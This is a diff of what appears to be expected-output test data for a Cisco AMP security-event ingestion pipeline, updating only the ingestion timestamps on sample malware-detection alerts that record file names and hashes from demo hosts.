"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -2084,7 +2084,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337174700Z",
+ "ingested": "2021-12-14T14:40:41.774852290Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -2183,7 +2183,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337179600Z",
+ "ingested": "2021-12-14T14:40:41.774852705Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -2267,7 +2267,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337185500Z",
+ "ingested": "2021-12-14T14:40:41.774853126Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -2366,7 +2366,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337190500Z",
+ "ingested": "2021-12-14T14:40:41.774853541Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -2450,7 +2450,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337194500Z",
+ "ingested": "2021-12-14T14:40:41.774853966Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -2530,7 +2530,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337199200Z",
+ "ingested": "2021-12-14T14:40:41.774858073Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -2620,7 +2620,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337205100Z",
+ "ingested": "2021-12-14T14:40:41.774858502Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -2706,7 +2706,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337210900Z", + "ingested": "2021-12-14T14:40:41.774858925Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2796,7 +2796,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337215400Z", + "ingested": "2021-12-14T14:40:41.774859341Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2886,7 +2886,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337220Z", + "ingested": "2021-12-14T14:40:41.774859795Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2972,7 +2972,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337244600Z", + "ingested": "2021-12-14T14:40:41.774860380Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3062,7 +3062,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337250700Z", + "ingested": "2021-12-14T14:40:41.774860807Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3142,7 +3142,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337256700Z", + "ingested": "2021-12-14T14:40:41.774861219Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3228,7 +3228,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337262700Z", + "ingested": "2021-12-14T14:40:41.774861639Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3308,7 +3308,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337268600Z", + "ingested": "2021-12-14T14:40:41.774862049Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", 
